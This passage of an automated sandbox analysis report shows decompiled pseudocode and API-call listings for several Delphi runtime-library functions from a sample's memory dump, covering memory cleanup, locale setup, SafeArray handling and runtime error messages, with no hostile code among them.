    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
